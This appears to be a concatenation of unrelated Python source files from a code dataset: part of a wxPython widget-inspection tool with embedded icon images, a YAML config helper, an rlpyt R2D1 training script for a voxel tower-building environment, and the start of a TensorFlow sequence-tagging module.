rect.SetPosition(pos)
self.DoHighlight(tlw, rect, self.color1)
def HighlightSizerItem(self, item, sizer, penWidth=2):
win = sizer.GetContainingWindow()
tlw = win.GetTopLevelParent()
rect = item.GetRect()
pos = rect.GetPosition()
pos = self.FindHighlightPos(tlw, win.ClientToScreen(pos))
rect.SetPosition(pos)
if rect.width < 1: rect.width = 1
if rect.height < 1: rect.height = 1
self.DoHighlight(tlw, rect, self.color1, penWidth)
def HighlightSizer(self, sizer):
# first do the outline of the whole sizer like normal
win = sizer.GetContainingWindow()
tlw = win.GetTopLevelParent()
pos = sizer.GetPosition()
pos = self.FindHighlightPos(tlw, win.ClientToScreen(pos))
rect = wx.Rect(pos, sizer.GetSize())
dc, dco = self.DoHighlight(tlw, rect, self.color1)
# Now highlight the actual items within the sizer. This may
# get overdrawn by the code below for item boundaries, but if
# there is border padding then this will help make it more
# obvious.
dc.SetPen(wx.Pen(self.color3, 1))
for item in sizer.GetChildren():
if item.IsShown():
if item.IsWindow():
r = item.GetWindow().GetRect()
elif item.IsSizer():
p = item.GetSizer().GetPosition()
s = item.GetSizer().GetSize()
r = wx.Rect(p,s)
else:
continue
r = self.AdjustRect(tlw, win, r)
dc.DrawRectangle(r)
# Next highlight the area allocated to each item in the sizer.
# Each kind of sizer will need to be done a little
# differently.
dc.SetPen(wx.Pen(self.color2, 1))
if isinstance(sizer, wx.WrapSizer):
for item in sizer.GetChildren():
ir = self.AdjustRect(tlw, win, item.Rect)
dc.DrawRectangle(ir)
# wx.BoxSizer, wx.StaticBoxSizer
elif isinstance(sizer, wx.BoxSizer):
# NOTE: we have to do some reverse-engineering here for
# borders because the sizer and sizer item don't give us
# enough information to know for sure where item
# (allocated) boundaries are, just the boundaries of the
# actual widgets. TODO: It would be nice to add something
# to wx.SizerItem that would give us the full bounds, but
# that will have to wait until 2.9...
x, y = rect.GetPosition()
if sizer.Orientation == wx.HORIZONTAL:
y1 = y + rect.height
for item in sizer.GetChildren():
ir = self.AdjustRect(tlw, win, item.Rect)
x = ir.x
if item.Flag & wx.LEFT:
x -= item.Border
dc.DrawLine(x, y, x, y1)
if item.IsSizer():
dc.DrawRectangle(ir)
if sizer.Orientation == wx.VERTICAL:
x1 = x + rect.width
for item in sizer.GetChildren():
ir = self.AdjustRect(tlw, win, item.Rect)
y = ir.y
if item.Flag & wx.TOP:
y -= item.Border
dc.DrawLine(x, y, x1, y)
if item.IsSizer():
dc.DrawRectangle(ir)
# wx.FlexGridSizer, wx.GridBagSizer
elif isinstance(sizer, wx.FlexGridSizer):
sizer.Layout()
y = rect.y
for rh in sizer.RowHeights[:-1]:
y += rh
dc.DrawLine(rect.x, y, rect.x+rect.width, y)
y+= sizer.VGap
dc.DrawLine(rect.x, y, rect.x+rect.width, y)
x = rect.x
for cw in sizer.ColWidths[:-1]:
x += cw
dc.DrawLine(x, rect.y, x, rect.y+rect.height)
x+= sizer.HGap
dc.DrawLine(x, rect.y, x, rect.y+rect.height)
# wx.GridSizer
elif isinstance(sizer, wx.GridSizer):
# NOTE: More reverse engineering (see above.) This time we
# need to determine what the sizer is using for row
# heights and column widths.
#rh = cw = 0
#for item in sizer.GetChildren():
# rh = max(rh, item.Size.height)
# cw = max(cw, item.Size.width)
cw = (rect.width - sizer.HGap*(sizer.Cols-1)) / sizer.Cols
rh = (rect.height - sizer.VGap*(sizer.Rows-1)) / sizer.Rows
y = rect.y
for i in range(sizer.Rows-1):
y += rh
dc.DrawLine(rect.x, y, rect.x+rect.width, y)
y+= sizer.VGap
dc.DrawLine(rect.x, y, rect.x+rect.width, y)
x = rect.x
for i in range(sizer.Cols-1):
x += cw
dc.DrawLine(x, rect.y, x, rect.y+rect.height)
x+= sizer.HGap
dc.DrawLine(x, rect.y, x, rect.y+rect.height)
# Anything else is probably a custom sizer, just highlight the items
else:
del dc, odc
for item in sizer.GetChildren():
self.HighlightSizerItem(item, sizer, 1)
def FindHighlightPos(self, tlw, pos):
if self.useOverlay:
# We'll be using a ClientDC in this case so adjust the
# position accordingly
pos = tlw.ScreenToClient(pos)
return pos
def AdjustRect(self, tlw, win, rect):
pos = self.FindHighlightPos(tlw, win.ClientToScreen(rect.Position))
rect.Position = pos
return wx.Rect(pos, rect.Size)
def DoHighlight(self, tlw, rect, colour, penWidth=2):
if not tlw.IsFrozen():
tlw.Freeze()
if self.useOverlay:
dc = wx.ClientDC(tlw)
dco = wx.DCOverlay(self.overlay, dc)
dco.Clear()
else:
dc = wx.ScreenDC()
dco = None
dc.SetPen(wx.Pen(colour, penWidth))
dc.SetBrush(wx.TRANSPARENT_BRUSH)
drawRect = wx.Rect(*rect)
dc.DrawRectangle(drawRect)
drawRect.Inflate(2,2)
if not self.useOverlay:
pos = tlw.ScreenToClient(drawRect.GetPosition())
drawRect.SetPosition(pos)
wx.CallLater(self.highlightTime, self.DoUnhighlight, tlw, drawRect)
return dc, dco
def DoUnhighlight(self, tlw, rect):
if not tlw:
return
if tlw.IsFrozen():
tlw.Thaw()
if self.useOverlay:
dc = wx.ClientDC(tlw)
dco = wx.DCOverlay(self.overlay, dc)
dco.Clear()
del dc, dco
self.overlay.Reset()
else:
tlw.RefreshRect(rect)
def FlickerTLW(self, tlw):
"""
Use a timer to alternate a TLW between shown and hidded state a
few times. Use to highlight a TLW since drawing and clearing an
outline is trickier.
"""
self.flickerCount = 0
tlw.Hide()
self.cl = wx.CallLater(300, self._Toggle, tlw)
def _Toggle(self, tlw):
if tlw.IsShown():
tlw.Hide()
self.cl.Restart()
else:
tlw.Show()
self.flickerCount += 1
if self.flickerCount < 4:
self.cl.Restart()
#---------------------------------------------------------------------------
from wx.lib.embeddedimage import PyEmbeddedImage
Refresh = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAABehJ"
"REFUSImdll1olNkZx3/vRzIxk5lJbMwmGHccP+JHS6VrYo3TKCvL0i0LLTRB8cbLitp6p9ib"
"elHohVLT0BqXBnetqBQveiWF0oXiF+1FS4PUxFgbm0yYTN/JZL4nmcl7/r3IJMRlodAHDhwO"
"z8d5/uf/PM+x+N9yADgDfAtwAAvwgafAJ8DfvsxIq3q4G86cuiHAB8C/gZLjOO/4vv8u8LWu"
"rq4lgGQy2dTQ0JDZuXPn9snJyXmgGYgBnwMGcCzwBZb7BedbgJ+5rntk69atJdd1f/D69evX"
"tm1bAwMDDA4ONlmWxYMHD5iYmGj0fT8BhGOx2Cezs7MdKysrfwZ+DCTXgmzMaovjOPdXs1tf"
"nwJXgX8ODQ0plUqpXC7r9OnTAmZDodDNtra2zzba2Lb9AOj8MtjGAIVCIfX29ppDhw6Z1tZW"
"AWpvb9fNmzf9dDqtUqmksbExPxQKCdC+ffvU29ur3t5eEw6H1wL9po7KunzgOM4/AB08eNBM"
"TU3J8zxdunRJtm3r4sWLkqRCoaBkMilJunz5smzb1oULFzQ/P6/p6Wn19/cbQK7rvgQ+2hig"
"Z/v27c8A9fX1yfM8JRIJJZNJzczMKJVKqVQqKZ/PK5fLqVgsKpVKaWZmRslkUolEQouLixoY"
"GDCAotHo34H9bEijMZvNft7W1hYJBAJf9zyPeDxOR0cHoVCIxsZGarUalmVhWRbGGILBIJFI"
"<KEY>"
"<KEY>"
"<KEY>"
"4vG4Tp48qdHRUV+SisWicrmcJOnp06d6//<KEY>"
"BwcHdfz4cdm2rbpvXnR1dVVGRkaUy+WUz+eVTCbX95J07949NTQ0bOS6bt++LUnK5/PK5/Mq"
"<KEY>pVIaHR1Vd3f3MvDCZa1nuC6+72NZFsFg8K0CkbQOA4AxBmPMWzrFYpFwOIxlWdi2"
"jWVZAJYD/KhUKr2ztLTE48ePWVpaMocPH7Z838cYQyAQIJ/P8+rVK2ZnZ5HEkSNHGBoaIhqN"
"sry8jG3bbN68mfv375uRkRHr2bNnjI+PO0DKAq4AvbZtNxljdnR0dMTOnDnDuXPnCIfDABQK"
"BSYnJ5mensYYw44dO9i7dy/hcBhJVCoVRkZGGB4eJpfLzXV2ds5mMpmVarX6AqDDcZzj9cL4"
"+f9L0+bmZgEKh8O3enp6+vbs2fN94D0HKEmqxWKxYDabPRqJRN47e/YsAwMDBINBXNfFGEOl"
"UqFarVKtVtdhCQQCACwvL1Or1VhcXKRUKk3Ozc39cWFh4V/Ay7U32rWxVczPzyuRSMjzPHme"
"<KEY>"
"daLRKFevXqWlpYVyuQxAS0sLN27cIBqNcu3aNZqamlhaWkKSABKJxBYgZoEQWEOrPenTOobq"
"7+838Xjc7N+/X4BaWlo0Njbm5/N5ZbNZ3blzx+/s7BSg1tZWxeNxxePx9fYO3AUaV69brwOg"
"qz4s1guqtbX1t+Fw+NfA7IkTJ5TL5ZTJZHTq1CkBb4BfAp9ttHFd93dA95pvF+AgNPwVksaY"
"HwIV13W/2d3dnX/z5s1Pd+/e7TQ3N+9LJpPdd+/exXVdPM/Dtu2XxpiRWCzWJOmrc3NzbbVa"
"7S8rKyuXgASrqBh+AnY9i43z+aM6bbf29PR8LxAI/AlQd3f38rZt25YdxxHwB8dxvg28C+wF"
"vrMOS30MrGdwBSytDmgLMBb8fo1eU1NT7cAE8JVEIrHx2zLt+/5/gJm66mT9oharPwsL4L/1"
"GXlKb/xX4wAAAABJRU5ErkJggg==")
Find = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAABgRJ"
"REFUSIm1lU1oG9sVx/9z5440+kBWJUvGDZESXuskZPMIwVaoybNp4niXEChdJPDAIWk+IGnA"
"i1Ioz9208apk10WcZFMI3Zgugrww6cNxKcakdoK/ghU7k5EsW2PLljXfc2duFw/5uaRv1x4Y"
"uHc4c3/38P+fM8D/OYTDm7Gxsd/4vv/H169fQ5IkAIDjODh16hSy2ey3t27d6geAJ0+eFDVN"
"G1xYWEA4HAYAeJ6H3t5eUEp/f+PGjZHPSOPj48P37t1j+XyeAzh4QqEQLxQK/Pr1639v5V67"
"dq3Y29t7kEMI4aIo8lwux2/fvs3Gx8d/28qlrYXv+18RQsTNzU129epVWigUUC6X8fz5c8zN"
"zUEQBKuVu7a2Zs7MzOD06dO4c+cOJicnUavVMDs7ywRBoIyxfgB/+A8ApXS7Xq8jkUjQCxcu"
"4MqVK1hbW8OrV6/w6dMndHV1fXHmzJmvCSGs2WyeePPmDU6ePImbN2+CUgpVVVEqleju7i4o"
"pdufVSDLMhhj0DQNMzMz2Nragu/72N7ehizLLJ1Od3me91wQBKRSKSSTSW9+fl56/PgxFhcX"
"IQgCNE2DbdsIhUL4DOC6LjjnIIRAFEXU63VYloUgCBAEAVUUJTBN0wGAWCwW5pxLtm1jdXUV"
"mqYhnU4fGIMxdgAgrcWHDx+aiqJAFEVks1l4nodisQjHcdDT04NsNvuPYrEYLRaL0Ww2++rc"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>/+/a2pqalFCgDhcPhjpVL50jRNWigU0N/fj0uXLkFVVayvr9OFhYVSNBot"
"p1KpPgAol8tTjUajI5/PnxgYGIAoitB1HdVqFe/fv/dyudxPG43GXwD8FQDw8OHDuVQqxQcG"
"BnitVuOGYfD19XU+PDzM29raOIBhAJFDDZgEcLuvr48risKbzSbXNI2PjIxwWZZ5LpfjDx48"
"WD5wESEElFLoug5VVRGJRFAqlaDressZDIB7qPE9AL7jOFBVFYZhYGNjA3t7e5AkCYIggBDy"
"vU0dx3FM04Smadjc3IQsy1heXoZpmq1Z8ysAg4cA4wB+7DgOKpUKPM/DysoKdnZ2YJomJEmC"
"4zguAIhjY2MjL168+DmAeKFQQGdnJ2zbRrVaRb1ex/Lyssc57+jp6fnJ8ePHkc/ncfTo0S/K"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"EAQBoVAInufBsr4bvJIkodUHKJVKkGUZrutid3cXhmHA9338UFBKYRgGVldXEQqFYJomLMvC"
"<KEY>"
"y7K+t2kkEkEQBFBVNVhaWiLRaBTxeByKoiAIAtRqNT+dTosA2g8d3k4pRb1e9+fn58V0Og1V"
"VdFsNsE5h6Ioge/7JBKJgFqWNX/kyJETGxsbkampKXDOEQTBQYmSJInxeBwAploAQsjrWCx2"
"VpIkcXJyEr7vQ5Kkw7qRzs5Ox7KsZQEAhoaG5iKRyJctcQ5HIpFAo9H487Nnz+4cfj80NPSn"
"RCLx6/39/c++kWUZtm2vPH369NQPivi/in8Df18XwyUA5+QAAAAASUVORK5CYII=")
ShowSizers = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAABChJ"
"<KEY>"
"RhcirkSpigSECl0WBa104UKoSIoLS8TWlja1NTOTyUzz5s37uNdFWpumJSktHriry//8zj38"
"z7nwP4dY5/7BUqn0quu62621i9cJhSjGcTzTarUOAr/dFn1sbGy/N+SdksgoQ2bh2mFBQpTz"
"vdP1ev3AWjkya10qpe4yPbPZ3GeUecEMswQoYK4I3w+wzWiz3qgbtw0AQoHoswWfNxyYLYE2"
"8GcVfr8IzU5gjOnfCWA5YuCvHPw0CRkLhGDjW5LeGiAFWjGcaYKyUHLAwvoeWQcgpczZjM3z"
"A3CiD5fPAlikFXRicNy8lNJbK4das/A0VdKVJd/4oWqJZhSGVcJUeH3n5JA/NGe1OhEG/W+i"
"KJq9LUAURe1KuVJQrrqnn4YVrXXkOE5gFCpf8NteLvdts9k8AgRXJDf0bC1ArlgsTiVJsqfX"
"6+1K03RQLpenfd//tdvtbh0MBvdaaxe01pcGg8FFlq1wU8jNoqiUeq5Wqx3SWlutdWvTpk3v"
"ANuBbY1G423Xdecdx7EjIyOHlVLPA6X1kl4lK6XU7rGxsU+UUkue54XlcvlL4LEVL36kUql8"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"Xq8fk0IkCGVxci2UnsfNz1MatSDtUN7rT0xMvLa6lePj4/v8wlAfsCVUuJFMZxh1eQMqyIFF"
"irRerx/LGGMCYa3ioV1f8el30/w4k8V178bNfMjHL3mcPREA0U1MES3ZNK2R6Z9katpgkpBU"
"jFLovcnJRz8QF54wxgTXVoUQl9iBzz/bniQlT39JIdecQywICfEwQwFkd4KqdAmDS8gKEMLK"
"XZTaOVImsbyOpM1QXiPkmgBAZBApeOEsS5OSjD8gJYsG6AFkhBA5C3D6+G72vudTGYXg8gYQ"
"0J6DDB4sK67LLISjhXQ6xLm3+OXxU6RuBGxEM0sPLFkhRC5jjDmntD5D2N4jDr8LsMCV+bCQ"
"t8Xhs0mStFYD4jhu55B/LEpx//vi/A5gieWdJLBoV+m2MeacAJ6uVqt7pZQNa+11v5MQohAE"
"wdFut/sFcH4VY9T3/X2+7z9lre2t0mXTNP17fn7+6/V6fMfxL1klnkaQRVDaAAAAAElFTkSu"
"QmCC")
ShowFilling = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAAAZ5J"
"REFUSIntlc9KAkEcxz+tu7OxLRSuGUXtIfUpukW9QJcO3nqELoLXLr2Bt47dRBAqgxJ6BqMw"
"PJe0FEliaLNrFxV1zXatY9/TMDPf72eG3/yBf/2guaH2DrALrADtGfME8AKUgCsAdWhwX1XV"
"bSnlMtCZEaApivrqeXJxEmBDSrl+dHQoNjf3OD9/xjSDJ5vmMre3Z1xeHi8AG/3+YcAH8GEY"
"SbG6uoVtP2IYwQFLS2s8PT0MciYBALi5uUfTrrEsB88LDtB1C027A+h+N6cAvBUK+e6surg4"
"6wLvvSwAlHFKu/0ZfNkBvD6AEGJmwCSvrwaNRgOAZrMZKtw0zYF3KiCXy1Eul2m1WqEAhmFQ"
"q9VgrMg+QKVSoVqt4oU5QoCiKHQ6/vvpA2QyGdLpNPV6PRQgHo+Tz+fJZrPTAYlEgmQyiW3b"
"oQBCCFKpFIy+b36ArusDQ1j1vCM18B3TaDQaOrgvy7Jgyg7mgflisQiA4zihwmOxGKVSCUDv"
"ZTFOO/mL5zoSiby6rnsFHMDoDk6llA6//HBc1+1/OP8Kpi8497f1tG0HzQAAAABJRU5ErkJg"
"gg==")
Icon = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAABHNCSVQICAgIfAhkiAAAALhJ"
"<KEY>"
"McvCEIBdm3F7/fr0FKgBRFaIrHkAdykdQFmEGm2HL233BAIAYmxYEqjePo9SBYBvBKppclDz"
"prMcqAhbAtknJx+3AKRHgGhnv4iApQY+jtSWpOY27BnifNt5uyk9BekAoZNwl21yDBSBi/63"
"yOMiLAXaf8AuwP9n94vzaTYBsgHeht4lXXmb7yQAAAAASUVORK5CYII=")
CollapseTree = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAAAf9J"
"REFUSIm9lD9r20AYhx9Fxe5SKDIynVJodFMaChkC6eBCJ+WWdulSb1o6RR8gH6AfQF5aSksX"
"aQ0eajwVkinO1MFk0YXg0uLSISZDoQhcddAf5MR241buD4670/tyD+/vXh0sWdqUb1vAQ2Bj"
"Suwb0E7Xx38DaAKPgTuAnJLfSSEAn4DWIoAm8ByQruti2zYAlmUBoJSi2+3ieV4R1v0TJANs"
"AS8Ap9PpYFkWUSSuJFcqIUopAKSUAO+A18yxS0/nZ8AD13WFbdtEkWB9Hep1ODqC0QgMA8bj"
"<KEY>4/<KEY>"
"<KEY>"
"BD8Kh1cqIbp+ThAEVKtVBoNBCziZBfjX/wDgEHg0C7D0O8gs+grcAm76vi80TcM04eJCYZqg"
"6+ecnR0TBAGu6+L7PlJKhAgJQ+6SvF/vrwNsAm+BD0B8eTQajXztOMT7HnFrL48fpGNCizzX"
"Q5IXdDfdN/Y92Hna5s2rJ+y+zPPm3skiOoCkip+f23Fr70o1pWgCkoGKkKV3URnKqyjaxTKs"
"omCX4+SQ0pS1aew4xJub5VZwGZQdfv83yOfTR/iA1xwAAAAASUVORK5CYII=")
ExpandTree = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAAAepJ"
"REFUSIm1lDFr20AYhp+ri+iSxUUhW4dIU9wlQ4YOKnRSj4K7Z9NSCFg/ID+gP0BZWkpLF3kN"
"Giq0pkOpMxWSTFIIFIqHQCFbUQnXQTpFslXXptYLx90nvdzD9913Bx1LtHzbA54Aj1v+nQFf"
"yvXpMoD7M/E+8AzYAmSLP66BbSBcBTACXED6vo/rugBYlgVAlmUkSSKDIND+rXJeCNEl2gNe"
"AV4cx1iWRZ7bc2bDSMmyDAApJcAH4C0LytUr5wPA8n3fdl2XPLfZ2YHNTbi+vjPf3j7ENKHf"
"<KEY>"
"8XBYZDLrXQnQhRoA3SEAUaSIItWIz89Vm3e6DOAMiJMkwTBSALa3i6Gl14aRYhgpSZLgOA7A"
"t0WA/70HAJ+Bp//KoDPpi/YD2AAehGFoCyEwTbi5yTBN6PV+cnV1yng8xvd9wjBESoltp6Qp"
"jyjer4/LAPeB98AnQM0Ox3GqteehjgPU0WH1/6QcDa3yXE8pDnRUxs5xAM9fRrx7M2T0uvIt"
"PJNVdAJFFr++R+rocC6btagB0aA6pPMuWoeqLOrlootSUSuX51WQtUm3qfI81O7uejOYBenN"
"X/wBVz/ONKbGYPkAAAAASUVORK5CYII=")
HighlightItem = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAAAQZJ"
"REFUSInFlTGSgjAUhv8XuIRl9ga0XgmuoI5abwfH8Ai22GlJZ0otuQD5t3DZ1V1CwgzgP8OQ"
"QCZfkv+9FxEVYUrFbYO2oW+wqEiGAtRzhyRIQh9eH+RXAMBmvfIuohcwheLnTnZ6vM3NjAaQ"
"1mTahvrAHwCzj+BJVI83sesHAMjRM3OVgNkFm/WK292+EzKvB86zr5Lu76b2AubdAbqMda0+"
"UOIqFdY2lKMHYGrw06DL3Tbrxzmi/Iq0JNLyO/Pxm/Uze/BXVRIUKajvKM6AXuh/kfjeHTC7"
"TAdw1RfahmlJFOewgtjvQY/0QgeNe3MUOVQsw2/OwQBRkQy5Op2lYixN7sEXVhRd4PXVHvwA"
"AAAASUVORK5CYII=")
EvtWatcher = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAABwxJ"
"REFUSIltlltsXFcVhr+zzzlzztw949vMxGPHl3Hiqk6I07RJhcBGoUK0VSuaSFwahAChSkiV"
"QCotlQAJP/FAeKFPSChRJUAtqZACjUpJBCqUlEY0l7HjpraT+DKejDPjmfHcznXz0Bg1iPWy"
"ttbD/629tbT/pXB/KIAEVCADxIBdwMi93AX4QBlYA5aBIlADNvg/oXzirAIeoAcCgVFN0460"
"Wq0DuVzuc7VaLVspl52xsTHN9TwWFxfdbDarKYqysLKy8tdYLHalXq9fBG7fa0Dcy/8F7BSi"
"hmEcdF33Cc/znt63b1//1NRUMBQKqeFolOHRMTzbYmlxEcdx2Nrast+7eNFaWl6+bZrm667r"
"<KEY>/VarUTmqY9MTMz03vs2HFS/X1eOjvojmUHFM22sIMRXN/nxlxe"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"C+U011YM3gvojCwskZAOzclxkgFDCYZCyv79+735+fnuUqkUjUQii51Op6YCWcdxnsiNjR0+"
"fuKE+cUjR+Sg7wurt5eA6bB2I8b3/1Hn3EKFY+UYzS2H2Y1bbFlpDuaydJsbBAo1woMDaLqO"
"lFIpFApsbGysxGKxD1XgwJ7x8ecOPPLI4NMPP+w9ODqq2uEwkSvLrJWzfP5PS/SoJb7xpSy/"
"GNUJd6noWoK3bn1E+a7D4XiaaJ+FpwWpVatKu9Vyt5vNrmaj4ZZKpUsCGCkWi/1d8TiZ3cMS"
"VcHvWLyvJHj2gy0mBz1+/7VJHvRXmDv5dc6e/jF1c4HUeJjXS02ev9HhcjCDY2ok0ymGRkak"
"qigU79xJCyFGNGBXrV4XXaEQxsiI4mnglRv8OZbjxvYax2cGaEfavPnTU/CrV1kH1qv/5Oi3"
"<KEY>"
"<KEY>"
"<KEY>"
"JeALoLy0vOzevL5AvbsLPJPEu9exd8NPomtcr3jseupJeOYxcCyQEp47wa7Dh3hrq8PJ3iLa"
"uABVQVU1LMeR1+fnKZVKlmmamxqwtiuT8betDvXFRUlmEMZ7eDzZ4vrGCK9duUx/LsL0t37N"
"+sQ7aIZB6tHPkF8pYJeafDfdw5Pr8/j9uymUNvlwfl5quk4ymbQrlcqKBiwJIZaqtVpvcXVd"
"jA4OSW9olzJuW/xcKxJWDV5d1Ulne/jqp79Mx4U3i228lQDP70nyvf0msZaPVymzcrcsC8Wi"
"aGxvI4T4CFhSgWC9Xk90ms29vcPD4eHJSS9gu0JtO8Q6qxwaHmYpFmF5ZZPHb0VQq5Lzosg3"
"H0jzwsEg+qhLM9GLslGg4jj+uQvn1fNvv32rVCqdicfjH6iAHg6HzVKpNNWoVvt6+/tlJBAQ"
"<KEY>X+/<KEY>"
"<KEY>"
"<KEY>"
"pPjSQ8VD85r43XGMaIzKZlmura95Fy9eFLOzs9RqtX8JId5wXfeP8PFk7wAUoBQMBu86jhOs"
"<KEY>/BcjzZDGjybrPl5/Nz3rWrV+XZs2e1U6dO+Xfu3MkLId7QNO01"
"<KEY>"
"XC4WiwuGYZyRUp63bfsm4O5oftL0dyAiGAxmDMM4UK1WJ<KEY>"
"<KEY>"
"<KEY>
| 1.914063 | 2 |
util/config.py | entn-at/AGAIN-VC | 78 | 12761609 | <gh_stars>10-100
import os
import yaml
class DotDict(dict):
"""
a dictionary that supports dot notation
as well as dictionary access notation
usage: d = DotDict() or d = DotDict({'val1':'first'})
set attributes: d.val2 = 'second' or d['val2'] = 'second'
get attributes: d.val2 or d['val2']
"""
__getattr__ = dict.__getitem__
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
def __init__(self, dct={}):
for key, value in dct.items():
if hasattr(value, 'keys'):
value = DotDict(value)
self[key] = value
def __getstate__(self):
return self.__dict__
def __setstate__(self, dct):
self.__dict__ = dct
def todict(self):
dct = {}
for k, v in self.items():
if issubclass(type(v), DotDict):
v = v.todict()
dct[k] = v
return dct
class Config(DotDict):
@staticmethod
def yaml_load(path):
ret = yaml.safe_load(open(path, 'r', encoding='utf8'))
assert ret is not None, f'Config file {path} is empty.'
return Config(ret)
@staticmethod
def trans(inp, dep=0):
ret = ''
if issubclass(type(inp), dict):
for k, v in inp.items():
ret += f'\n{" "*dep}{k}: {Config.trans(v, dep+1)}'
elif issubclass(type(inp), list):
for v in inp:
ret += f'\n{" "*dep}- {v}'
else:
ret += f'{inp}'
return ret
def __init__(self, dct):
if type(dct) is str:
dct = Config.yaml_load(dct)
super().__init__(dct)
try:
self._name = dct['_name']
except:
self._name = 'Config'
def __str__(self):
return self.__repr__()
def __repr__(self):
ret = f'[{self._name}]'
ret += Config.trans(self)
#for k, v in self.items():
# if k[0] != '_':
# ret += f'\n {k:16s}: {Config.trans(v, 2)}'
return ret
def _apply_config(self, config, replace=False):
for k, v in config.items():
self[k] = v
def __getattr__(self, name):
try:
return self[name]
except:
raise AttributeError(name)
| 3.140625 | 3 |
examples/example_1.py | BoyuanLong/rlpyt | 0 | 12761610 |
"""
Runs one instance of the Atari environment and optimizes using DQN algorithm.
Can use a GPU for the agent (applies to both sample and train). No parallelism
employed, so everything happens in one python process; can be easier to debug.
The kwarg snapshot_mode="last" to logger context will save the latest model at
every log point (see inside the logger for other options).
In viskit, whatever (nested) key-value pairs appear in config will become plottable
keys for showing several experiments. If you need to add more after an experiment,
use rlpyt.utils.logging.context.add_exp_param().
"""
from rlpyt.runners.async_rl import AsyncRlEval
from rlpyt.samplers.serial.sampler import SerialSampler
from rlpyt.envs.atari.atari_env import AtariEnv, AtariTrajInfo
from rlpyt.algos.dqn.dqn import DQN
from rlpyt.agents.dqn.atari.atari_dqn_agent import AtariDqnAgent
from rlpyt.runners.minibatch_rl import MinibatchRlEval
from rlpyt.utils.logging.context import logger_context
# R2D1
from rlpyt.samplers.parallel.gpu.sampler import GpuSampler
from rlpyt.samplers.parallel.gpu.collectors import GpuWaitResetCollector
from rlpyt.samplers.async_.gpu_sampler import AsyncGpuSampler
from rlpyt.samplers.async_.collectors import DbGpuResetCollector
from examples.voxel_r2d1 import configs
from rlpyt.algos.dqn.r2d1 import R2D1
from rlpyt.runners.minibatch_rl import MinibatchRl
from rlpyt.agents.dqn.atari.atari_r2d1_agent import AtariR2d1Agent
from rlpyt.utils.launching.affinity import affinity_from_code, encode_affinity, quick_affinity_code
# Voxel
from rlpyt.envs.gym import voxel_make
def build_and_train(game="TowerBuilding", run_ID=0, cuda_idx=None):
# Either manually set the resources for the experiment:
affinity_code = encode_affinity(
n_cpu_core=2,
n_gpu=1,
# hyperthread_offset=8, # if auto-detect doesn't work, number of CPU cores
# n_socket=1, # if auto-detect doesn't work, can force (or force to 1)
run_slot=0,
cpu_per_run=1,
set_affinity=True, # it can help to restrict workers to individual CPUs
)
affinity = affinity_from_code(affinity_code)
config = configs["r2d1"]
config["env"]["game"] = game
config["eval_env"]["game"] = config["env"]["game"]
sampler = AsyncGpuSampler(
EnvCls=voxel_make,
env_kwargs=config["env"],
CollectorCls=DbGpuResetCollector,
TrajInfoCls=AtariTrajInfo,
eval_env_kwargs=config["eval_env"],
**config["sampler"]
)
algo = R2D1(optim_kwargs=config["optim"], **config["algo"])
agent = AtariR2d1Agent(model_kwargs=config["model"], **config["agent"])
runner = AsyncRlEval(
algo=algo,
agent=agent,
sampler=sampler,
affinity=affinity,
**config["runner"]
)
config = dict(game=game)
name = "r2d1_" + game
log_dir = "tower_building"
with logger_context(log_dir, run_ID, name, config, snapshot_mode="last"):
runner.train()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--game', help='Voxel game', default='TowerBuilding')
parser.add_argument('--run_ID', help='run identifier (logging)', type=int, default=0)
parser.add_argument('--cuda_idx', help='gpu to use ', type=int, default=None)
args = parser.parse_args()
build_and_train(
game=args.game,
run_ID=args.run_ID,
cuda_idx=args.cuda_idx,
)
| 2.25 | 2 |
research/cvt_text/task_specific/word_level/tagging_module.py | jdavidagudelo/tensorflow-models | 1 | 12761611 | # Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Sequence tagging module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from research.cvt_text.corpus_processing import minibatching
from research.cvt_text.model import model_helpers
from research.cvt_text.model import task_module
class TaggingModule(task_module.SemiSupervisedModule):
def __init__(self, config, task_name, n_classes, inputs,
encoder):
super(TaggingModule, self).__init__()
self.task_name = task_name
self.n_classes = n_classes
self.labels = labels = tf.placeholder(tf.float32, [None, None, None],
name=task_name + '_labels')
class PredictionModule(object):
def __init__(self, name, input_reprs, roll_direction=0, activate=True):
self.name = name
with tf.variable_scope(name + '/predictions'):
projected = model_helpers.project(input_reprs, config.projection_size)
if activate:
projected = tf.nn.relu(projected)
self.logits = tf.layers.dense(projected, n_classes, name='predict')
targets = labels
